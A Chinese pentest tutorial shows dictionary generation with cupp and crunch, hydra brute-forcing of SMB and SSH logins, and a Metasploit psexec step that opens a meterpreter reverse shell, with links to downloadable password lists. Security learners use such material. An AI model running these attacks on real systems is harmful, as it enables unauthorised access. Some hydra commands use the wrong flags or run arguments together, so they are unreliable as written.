2022-渗透测试-口令破解-几款暴力破解和字典生成的工具

简介: 2022-渗透测试-口令破解-几款暴力破解和字典生成的工具

 目录

1.CUPP(kali)

2.亦思社会工程学学点生成器

3.一句话密码破解工具

4.crunch(kali)

5.hydra(kali)

1.CUPP(kali)

首先,安装cupp软件

 

apt install -y cupp

image.gif

image.gif编辑

新建一个文件夹,用于保存生成的字典

image.gif编辑

输入 cupp -i 命令开始编辑生成字典

image.gif编辑

根据自己已知的信息,生成字典。

image.gif编辑

查看生成的字典 cat san.txt

2.亦思社会工程学学点生成器

image.gif编辑

3.一句话密码破解工具

image.gif编辑

4.crunch(kali)

       crunch是kali自带的工具,是一种创建密码字典的工具。按照指定的规则生成密码字典,可以灵活的定制自己的字典文件。

首先,先尝试一个简单的命令。如图所示。1 8表示密码是8位 后面的是密码的范围,我们可以看出按照这种方式输出的字典有23TB。(切记,运行一下立马暂停,否则会卡死)

image.gif编辑

查看帮助

man crunch > crunch.help

image.gif

命令格式

crunch <min-len> <max-len> [<charset string>]  [options]

image.gif

参数说明

min-len         设定最小字符串长度(必选)
max-len         设定最大字符串长度(必选)
charset string  字符集
options
-b              指定文件输出的大小,避免字典文件过大
-c              指定文件输出的行数,即包含密码的个数
-d              限制相同元素出现的次数
-e              定义停止字符,即到该字符串就停止生成
-f              调用库文件

image.gif

特殊字符

%  代表数字
^  代表特殊符号
@  代表小写字母
, 代表大写字母

image.gif

查看库文件

cat /usr/share/crunch/charset.lst

image.gif

如图所示,前面显示的名称,后面显示的内容是字符集 。这些都是设置好的,我们也可以自定义写一个字符集。

image.gif编辑

例子1:生成-1-8位密码字典,字符集合为小写字母,从a开始到zzzzzzzz结束

crunch 1 8

image.gif编辑

例子2:生成1-6位的密码字典,字符集合为[abcdefg],从a开始到gggggg结束

crunch 1 6 abcdefg

image.gif编辑

例子3:生成指定字符串,比如生日的日期(%代表数字)

crunch 8 8 -t 199307%% -e 19930730

image.gif编辑

例子4:生成元素的组合,比如123.com

crunch 7 7 -t %%%.com -s 111.com -e 123.com

image.gif编辑

例子5:在字典中输出特殊字符

crunch 3 3  abc -t @@@ -l @aa

image.gif编辑

例子6: 以元素组合生成字典[zhangsan|1993|0701]

crunch 4 4 -p zhangsan 1992 0701

image.gif编辑

例子6:

自定义字符集合

vim /usr/share/crunch/charset.lst

创建自定义字符集合

添加一个字符集

image.gif编辑

使用自定义字符集生成[*.com] 字典文件

crunch 5 5 -f /usr/share/crunch/charset.lst test -t @.com

image.gif编辑

5.hydra(kali)

首先,先准备两个文件:常用的账号和密码文件。这个是我从github下载的,账号和密码都有几千条。文章最后,我会将文件下载地址分享一下。

image.gif编辑

windows口令破解

hydra -l ./user.txt -p ./pass.txt smb 192.168.0.110 -vV -f -e nsr

image.gif

-l  指定一个用户名
-p  指定一个密码
-P  指定密码字典
-L  指定用户名字典
-vV 显示爆破细节
-o  保存爆破结果
-f  找到正确的密码就停止爆破
-e  
  n null
  s same
  r 反向
-t  线程

image.gif

爆破成功后,我们使用msf中的use exploit/windows/smb/psexec模块去链接。

建立payload    set payload windows/meterpreter/reverse_tcp

image.gif编辑

查看需要配置的参数 show options

image.gif编辑

设置目标主机 set RHOSTS 192.168.0.110

设置账号和密码 set SMBPass xxx    set SMBUser  xxx

run或者exploit进行连接

linux口令破解

linux口令破解,也分为远程破解与本地破解。远程破解主要是爆破ssh服务,属于在线密码攻击。本地破解需要拿到linux的shadow文件,进行hash值破解,属于离线密码攻击。

破解ssh服务

hydra -l ./user.txt -p ./pass.txt ssh://127.0.0.1-vV -f -t 64

image.gif

分享下载链接

亦思社会工程学字典生成器

一句话密码破解工具

常用的账号和密码字典

链接:https://pan.baidu.com/s/1ErRFv4vnpHZxIufOhCjK3g 

提取码:bc9o


相关文章
|
4天前
|
网络协议 安全 测试技术
性能工具之emqtt-bench BenchMark 测试示例
【4月更文挑战第19天】在前面两篇文章中介绍了emqtt-bench工具和MQTT的入门压测,本文示例 emqtt_bench 对 MQTT Broker 做 Beachmark 测试,让大家对 MQTT消息中间 BenchMark 测试有个整体了解,方便平常在压测工作查阅。
133 7
性能工具之emqtt-bench BenchMark 测试示例
|
4天前
|
测试技术 C语言
网站压力测试工具Siege图文详解
网站压力测试工具Siege图文详解
31 0
|
4天前
|
机器学习/深度学习 数据采集 人工智能
【专栏】AI在软件测试中的应用,如自动执行测试用例、识别缺陷和优化测试设计
【4月更文挑战第27天】本文探讨了AI在软件测试中的应用,如自动执行测试用例、识别缺陷和优化测试设计。AI辅助工具利用机器学习、自然语言处理和图像识别提高效率,但面临数据质量、模型解释性、维护更新及安全性挑战。未来,AI将更注重用户体验,提升透明度,并在保护隐私的同时,通过联邦学习等技术共享知识。AI在软件测试领域的前景广阔,但需解决现有挑战。
|
4天前
|
测试技术
如何管理测试用例?测试用例有什么管理工具?YesDev
该文档介绍了测试用例和测试用例库的管理。测试用例是描述软件测试方案的详细步骤,包括测试目标、环境、输入、步骤和预期结果。测试用例库用于组织和管理这些用例,强调简洁性、完整性和可维护性。管理者可以创建、删除、重命名用例库,搜索和管理用例,以及通过层级目录结构来组织用例。此外,还支持通过Excel导入和导出测试用例,以及使用脑图查看用例关系。后台管理允许配置全局别名,如用例状态、优先级和执行结果。
|
4天前
|
机器学习/深度学习 人工智能 运维
深入探索软件测试:策略、工具与未来趋势
【5月更文挑战第14天】在软件开发的生命周期中,测试环节扮演着至关重要的角色。它不仅保证产品能够达到预定的质量标准,还有助于提前发现并修复潜在的缺陷,从而减少维护成本和提高用户满意度。本文将深入探讨当前软件测试领域的最佳实践,包括测试策略的制定、工具的选择以及面对快速变化的技术环境如何保持测试活动的前瞻性和灵活性。通过分析自动化测试、性能测试和安全测试等关键领域,本文旨在为读者提供一个全面的软件测试指南,同时对未来的发展趋势进行预测。
|
4天前
|
SQL 测试技术 网络安全
Python之SQLMap:自动SQL注入和渗透测试工具示例详解
Python之SQLMap:自动SQL注入和渗透测试工具示例详解
28 0
|
4天前
|
测试技术 API
探索软件测试中的自动化工具与挑战
本文探讨了软件测试领域中自动化工具的应用与挑战。通过分析目前主流的自动化测试工具,探讨了其在提高测试效率、减少人工成本、增强测试覆盖率等方面的优势。然而,自动化测试也面临着诸如脆弱性、维护成本高等挑战。最后,提出了一些应对挑战的建议,以期为软件测试领域的自动化工作提供一些启示。
16 1
|
4天前
|
机器学习/深度学习 人工智能 测试技术
提升软件测试效率与准确性的策略与工具
【5月更文挑战第2天】 在软件开发生命周期中,测试阶段是确保产品质量的关键。然而,传统的测试方法往往耗时且容易出错。本文将探讨一系列现代软件测试策略和工具,旨在提高测试效率和准确性。我们将分析自动化测试框架、持续集成(CI)、测试驱动开发(TDD)以及人工智能(AI)在测试中的应用,并讨论如何结合这些技术和方法来优化测试流程。
|
4天前
|
敏捷开发 监控 测试技术
探索自动化测试工具Selenium Grid的高效集成策略
【4月更文挑战第30天】在现代Web应用的快速迭代和持续部署中,测试自动化已成为确保产品质量的关键。Selenium Grid作为一款支持多种浏览器和操作系统的测试工具,提供了并行执行测试用例的能力,极大地提升了测试效率。本文将深入探讨如何高效地将Selenium Grid集成到现有的测试框架中,以及实施过程中的最佳实践,帮助团队最大化测试覆盖率,同时降低资源消耗。
|
4天前
|
中间件 测试技术 API
探索自动化测试工具的新边界:Selenium与Appium的集成实践
【4月更文挑战第30天】 随着移动应用和Web应用的不断融合,传统的自动化测试工具需要适应新的测试环境。本文将详细分析Selenium和Appium这两款流行的自动化测试工具的集成实践,探讨如何构建一个能够同时支持Web和移动端应用的自动化测试框架。通过对比两者的技术架构、功能特性以及在实际项目中的集成过程,我们旨在为读者提供一个清晰的指导,帮助他们在复杂的应用环境中实现高效、稳定的自动化测试流程。

热门文章

最新文章